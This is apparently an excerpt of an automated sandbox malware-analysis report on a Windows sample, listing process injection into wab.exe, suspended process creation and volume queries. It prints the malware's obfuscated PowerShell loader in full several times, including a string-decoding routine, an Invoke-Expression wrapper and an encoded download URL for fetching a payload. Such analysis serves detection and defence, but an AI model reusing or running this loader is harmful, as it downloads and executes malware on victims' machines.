HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4060000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: A5FA34			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$enchodontoid = 1;$multinervate='substrin';$multinervate+='g';function pisseskn($parate){$nongelatinizing=$parate.length-$enchodontoid;for($agrestical=5; $agrestical -lt $nongelatinizing; $agrestical+=(6)){$dextranase88+=$parate.$multinervate.invoke($agrestical, $enchodontoid);}$dextranase88;}function saprophagan($factories){. ($laurikke) ($factories);}$hovedvrker=pisseskn 'addlems,steo .andzconfoi vejrl reavlprintab.une/ca,ro5.icit.choos0skide lnnin(duellw desiimonopnwap.kdsavanoislanwdoercs emer bromnuovertaxopo opri.1allia0forel.vaing0 comb;angre decorwgraeni femin g.in6kursu4ect,c;ko tr parenxtyede6tri,h4taffe;phary elle,r,uresv kipe:,eseg1hjemm2hjlpe1klogt. igne0prd k) hove altergdis aejonnhcstrafkf,rudopseud/ st,w2r vhu0digi.1,ecir0fersk0nakke1k.ass0 mese1 ield osphrfklon.ifemaarklebiebrontf s.tyoamtsrxborte/ fron1excla2butto1 publ.svesk0handl ';$nuanceret=pisseskn ' sdelurepansmedhoehe.lirpar a-el,vaaukasegpoca,emagtkn divvtiodat ';$unshady=pisseskn 'xylo.h rabbthalfhtmika,pt,lles ayyu: un,o/ inka/d.kkedbo edrdicari beravpl,caeco.pa.dem bg husnovelbeobann,ganno,ltandsedegne. swinc fel,orebanmdemou/endkkudieumcad oc?dag oes,rtlx sadapbhaktonond r udtrtg imr=tobacddefraocl.ngwvkke nweakalfulfioplatoafo.stdstorb&klbesipessudbatte=stv r1oneratsperme,elveimesmen re.tjskoleufidg.nstopne ,rstahimmeiabiol- talescontrrbes.iibarbo4 undec emibsuppl4freed0 dagdutartr9aeropk.elefrudsy,lexecu2travexcoemp7antirxhypoej mbeld,imelg reeng.orsc ';$dousers=pisseskn 't llb>reimm ';$laurikke=pisseskn 'afpluigrligedemorxluckf ';$flyvestolene = pisseskn ' unwoekil.bcvibrihopsplo.ibbe mic,o%daiquaheroepgoldepud,krdsteelatum.dtoustia a,ch%brsli\ porcm shifesinopr tykeomythogskorsaskat sgastrt trihrintrau pu.sl.iuntacentr.digamb autoegrammshouse pid.l&grumo&und p delfe sst.cp,rtuhpigmeofrt s toppl$objec ';saprophagan (pisseskn ' punk$ di ogsa valslagbo s bubunscaa fluelmisl.:ombytal.mbasquee sidioteulempv jouretimbrrnaadia.usiktnong.iorgannindbrg onti=u,ear(f attcvelsemstevedne hu eks m/omskrcletfr ota$ ventfkern.lsciopy .igtv relees,less snakt tradou.bell fireecoelontot.ee malt)afspn ');saprophagan (pisseskn 'junke$ nsig appalunderoepipabisraea lit.lpresu:paritfgavend syfirgra.ue vendnnonpreresidh chanjhardme bedrm stil= chil$ armu sponnpa.klsbagflh.edbia epowdbe,tsy.icla.daa,esnringpunexploperci scat.ornb( drud$ apoldgiftioobjekudenatst,efoephr.tr unoxsindkr)vel.o ');$unshady=$fdrenehjem[0];saprophagan (pisseskn 'nupti$de,meg .krol takkoal.opb spe.agelatlvarpn:sprrebunfelaefteraskoledpetrorunderuundlitwor heskakbnmicro=cilion tracenonf,wu hen-tradio salibinscrja tikeu insc headtresta .gtessblo,kyudlndsnonsutfjor.e.aukam radi.,ystenilluvekupeettinkr.statiwhjlpeesnarebp.radcur allhangoihexace,phemn c litpensi ');saprophagan (pisseskn 'philo$triumb bun a unp.asubagdfo,kerdah iu.ridntsengeeskruensched. b.rghanchye duraarangsdprivael
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$enchodontoid = 1;$multinervate='substrin';$multinervate+='g';function pisseskn($parate){$nongelatinizing=$parate.length-$enchodontoid;for($agrestical=5; $agrestical -lt $nongelatinizing; $agrestical+=(6)){$dextranase88+=$parate.$multinervate.invoke($agrestical, $enchodontoid);}$dextranase88;}function saprophagan($factories){. ($laurikke) ($factories);}$hovedvrker=pisseskn 'addlems,steo .andzconfoi vejrl reavlprintab.une/ca,ro5.icit.choos0skide lnnin(duellw desiimonopnwap.kdsavanoislanwdoercs emer bromnuovertaxopo opri.1allia0forel.vaing0 comb;angre decorwgraeni femin g.in6kursu4ect,c;ko tr parenxtyede6tri,h4taffe;phary elle,r,uresv kipe:,eseg1hjemm2hjlpe1klogt. igne0prd k) hove altergdis aejonnhcstrafkf,rudopseud/ st,w2r vhu0digi.1,ecir0fersk0nakke1k.ass0 mese1 ield osphrfklon.ifemaarklebiebrontf s.tyoamtsrxborte/ fron1excla2butto1 publ.svesk0handl ';$nuanceret=pisseskn ' sdelurepansmedhoehe.lirpar a-el,vaaukasegpoca,emagtkn divvtiodat ';$unshady=pisseskn 'xylo.h rabbthalfhtmika,pt,lles ayyu: un,o/ inka/d.kkedbo edrdicari beravpl,caeco.pa.dem bg husnovelbeobann,ganno,ltandsedegne. swinc fel,orebanmdemou/endkkudieumcad oc?dag oes,rtlx sadapbhaktonond r udtrtg imr=tobacddefraocl.ngwvkke nweakalfulfioplatoafo.stdstorb&klbesipessudbatte=stv r1oneratsperme,elveimesmen re.tjskoleufidg.nstopne ,rstahimmeiabiol- talescontrrbes.iibarbo4 undec emibsuppl4freed0 dagdutartr9aeropk.elefrudsy,lexecu2travexcoemp7antirxhypoej mbeld,imelg reeng.orsc ';$dousers=pisseskn 't llb>reimm ';$laurikke=pisseskn 'afpluigrligedemorxluckf ';$flyvestolene = pisseskn ' unwoekil.bcvibrihopsplo.ibbe mic,o%daiquaheroepgoldepud,krdsteelatum.dtoustia a,ch%brsli\ porcm shifesinopr tykeomythogskorsaskat sgastrt trihrintrau pu.sl.iuntacentr.digamb autoegrammshouse pid.l&grumo&und p delfe sst.cp,rtuhpigmeofrt s toppl$objec ';saprophagan (pisseskn ' punk$ di ogsa valslagbo s bubunscaa fluelmisl.:ombytal.mbasquee sidioteulempv jouretimbrrnaadia.usiktnong.iorgannindbrg onti=u,ear(f attcvelsemstevedne hu eks m/omskrcletfr ota$ ventfkern.lsciopy .igtv relees,less snakt tradou.bell fireecoelontot.ee malt)afspn ');saprophagan (pisseskn 'junke$ nsig appalunderoepipabisraea lit.lpresu:paritfgavend syfirgra.ue vendnnonpreresidh chanjhardme bedrm stil= chil$ armu sponnpa.klsbagflh.edbia epowdbe,tsy.icla.daa,esnringpunexploperci scat.ornb( drud$ apoldgiftioobjekudenatst,efoephr.tr unoxsindkr)vel.o ');$unshady=$fdrenehjem[0];saprophagan (pisseskn 'nupti$de,meg .krol takkoal.opb spe.agelatlvarpn:sprrebunfelaefteraskoledpetrorunderuundlitwor heskakbnmicro=cilion tracenonf,wu hen-tradio salibinscrja tikeu insc headtresta .gtessblo,kyudlndsnonsutfjor.e.aukam radi.,ystenilluvekupeettinkr.statiwhjlpeesnarebp.radcur allhangoihexace,phemn c litpensi ');saprophagan (pisseskn 'philo$triumb bun a unp.asubagdfo,kerdah iu.ridntsengeeskruensched. b.rghanchye duraarangsdprivael
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$enchodontoid = 1;$multinervate='substrin';$multinervate+='g';function pisseskn($parate){$nongelatinizing=$parate.length-$enchodontoid;for($agrestical=5; $agrestical -lt $nongelatinizing; $agrestical+=(6)){$dextranase88+=$parate.$multinervate.invoke($agrestical, $enchodontoid);}$dextranase88;}function saprophagan($factories){. ($laurikke) ($factories);}$hovedvrker=pisseskn 'addlems,steo .andzconfoi vejrl reavlprintab.une/ca,ro5.icit.choos0skide lnnin(duellw desiimonopnwap.kdsavanoislanwdoercs emer bromnuovertaxopo opri.1allia0forel.vaing0 comb;angre decorwgraeni femin g.in6kursu4ect,c;ko tr parenxtyede6tri,h4taffe;phary elle,r,uresv kipe:,eseg1hjemm2hjlpe1klogt. igne0prd k) hove altergdis aejonnhcstrafkf,rudopseud/ st,w2r vhu0digi.1,ecir0fersk0nakke1k.ass0 mese1 ield osphrfklon.ifemaarklebiebrontf s.tyoamtsrxborte/ fron1excla2butto1 publ.svesk0handl ';$nuanceret=pisseskn ' sdelurepansmedhoehe.lirpar a-el,vaaukasegpoca,emagtkn divvtiodat ';$unshady=pisseskn 'xylo.h rabbthalfhtmika,pt,lles ayyu: un,o/ inka/d.kkedbo edrdicari beravpl,caeco.pa.dem bg husnovelbeobann,ganno,ltandsedegne. swinc fel,orebanmdemou/endkkudieumcad oc?dag oes,rtlx sadapbhaktonond r udtrtg imr=tobacddefraocl.ngwvkke nweakalfulfioplatoafo.stdstorb&klbesipessudbatte=stv r1oneratsperme,elveimesmen re.tjskoleufidg.nstopne ,rstahimmeiabiol- talescontrrbes.iibarbo4 undec emibsuppl4freed0 dagdutartr9aeropk.elefrudsy,lexecu2travexcoemp7antirxhypoej mbeld,imelg reeng.orsc ';$dousers=pisseskn 't llb>reimm ';$laurikke=pisseskn 'afpluigrligedemorxluckf ';$flyvestolene = pisseskn ' unwoekil.bcvibrihopsplo.ibbe mic,o%daiquaheroepgoldepud,krdsteelatum.dtoustia a,ch%brsli\ porcm shifesinopr tykeomythogskorsaskat sgastrt trihrintrau pu.sl.iuntacentr.digamb autoegrammshouse pid.l&grumo&und p delfe sst.cp,rtuhpigmeofrt s toppl$objec ';saprophagan (pisseskn ' punk$ di ogsa valslagbo s bubunscaa fluelmisl.:ombytal.mbasquee sidioteulempv jouretimbrrnaadia.usiktnong.iorgannindbrg onti=u,ear(f attcvelsemstevedne hu eks m/omskrcletfr ota$ ventfkern.lsciopy .igtv relees,less snakt tradou.bell fireecoelontot.ee malt)afspn ');saprophagan (pisseskn 'junke$ nsig appalunderoepipabisraea lit.lpresu:paritfgavend syfirgra.ue vendnnonpreresidh chanjhardme bedrm stil= chil$ armu sponnpa.klsbagflh.edbia epowdbe,tsy.icla.daa,esnringpunexploperci scat.ornb( drud$ apoldgiftioobjekudenatst,efoephr.tr unoxsindkr)vel.o ');$unshady=$fdrenehjem[0];saprophagan (pisseskn 'nupti$de,meg .krol takkoal.opb spe.agelatlvarpn:sprrebunfelaefteraskoledpetrorunderuundlitwor heskakbnmicro=cilion tracenonf,wu hen-tradio salibinscrja tikeu insc headtresta .gtessblo,kyudlndsnonsutfjor.e.aukam radi.,ystenilluvekupeettinkr.statiwhjlpeesnarebp.radcur allhangoihexace,phemn c litpensi ');saprophagan (pisseskn 'philo$triumb bun a unp.asubagdfo,kerdah iu.ridntsengeeskruensched. b.rghanchye duraarangsdprivael	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$enchodontoid = 1;$multinervate='substrin';$multinervate+='g';function pisseskn($parate){$nongelatinizing=$parate.length-$enchodontoid;for($agrestical=5; $agrestical -lt $nongelatinizing; $agrestical+=(6)){$dextranase88+=$parate.$multinervate.invoke($agrestical, $enchodontoid);}$dextranase88;}function saprophagan($factories){. ($laurikke) ($factories);}$hovedvrker=pisseskn 'addlems,steo .andzconfoi vejrl reavlprintab.une/ca,ro5.icit.choos0skide lnnin(duellw desiimonopnwap.kdsavanoislanwdoercs emer bromnuovertaxopo opri.1allia0forel.vaing0 comb;angre decorwgraeni femin g.in6kursu4ect,c;ko tr parenxtyede6tri,h4taffe;phary elle,r,uresv kipe:,eseg1hjemm2hjlpe1klogt. igne0prd k) hove altergdis aejonnhcstrafkf,rudopseud/ st,w2r vhu0digi.1,ecir0fersk0nakke1k.ass0 mese1 ield osphrfklon.ifemaarklebiebrontf s.tyoamtsrxborte/ fron1excla2butto1 publ.svesk0handl ';$nuanceret=pisseskn ' sdelurepansmedhoehe.lirpar a-el,vaaukasegpoca,emagtkn divvtiodat ';$unshady=pisseskn 'xylo.h rabbthalfhtmika,pt,lles ayyu: un,o/ inka/d.kkedbo edrdicari beravpl,caeco.pa.dem bg husnovelbeobann,ganno,ltandsedegne. swinc fel,orebanmdemou/endkkudieumcad oc?dag oes,rtlx sadapbhaktonond r udtrtg imr=tobacddefraocl.ngwvkke nweakalfulfioplatoafo.stdstorb&klbesipessudbatte=stv r1oneratsperme,elveimesmen re.tjskoleufidg.nstopne ,rstahimmeiabiol- talescontrrbes.iibarbo4 undec emibsuppl4freed0 dagdutartr9aeropk.elefrudsy,lexecu2travexcoemp7antirxhypoej mbeld,imelg reeng.orsc ';$dousers=pisseskn 't llb>reimm ';$laurikke=pisseskn 'afpluigrligedemorxluckf ';$flyvestolene = pisseskn ' unwoekil.bcvibrihopsplo.ibbe mic,o%daiquaheroepgoldepud,krdsteelatum.dtoustia a,ch%brsli\ porcm shifesinopr tykeomythogskorsaskat sgastrt trihrintrau pu.sl.iuntacentr.digamb autoegrammshouse pid.l&grumo&und p delfe sst.cp,rtuhpigmeofrt s toppl$objec ';saprophagan (pisseskn ' punk$ di ogsa valslagbo s bubunscaa fluelmisl.:ombytal.mbasquee sidioteulempv jouretimbrrnaadia.usiktnong.iorgannindbrg onti=u,ear(f attcvelsemstevedne hu eks m/omskrcletfr ota$ ventfkern.lsciopy .igtv relees,less snakt tradou.bell fireecoelontot.ee malt)afspn ');saprophagan (pisseskn 'junke$ nsig appalunderoepipabisraea lit.lpresu:paritfgavend syfirgra.ue vendnnonpreresidh chanjhardme bedrm stil= chil$ armu sponnpa.klsbagflh.edbia epowdbe,tsy.icla.daa,esnringpunexploperci scat.ornb( drud$ apoldgiftioobjekudenatst,efoephr.tr unoxsindkr)vel.o ');$unshady=$fdrenehjem[0];saprophagan (pisseskn 'nupti$de,meg .krol takkoal.opb spe.agelatlvarpn:sprrebunfelaefteraskoledpetrorunderuundlitwor heskakbnmicro=cilion tracenonf,wu hen-tradio salibinscrja tikeu insc headtresta .gtessblo,kyudlndsnonsutfjor.e.aukam radi.,ystenilluvekupeettinkr.statiwhjlpeesnarebp.radcur allhangoihexace,phemn c litpensi ');saprophagan (pisseskn 'philo$triumb bun a unp.asubagdfo,kerdah iu.ridntsengeeskruensched. b.rghanchye duraarangsdprivael	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
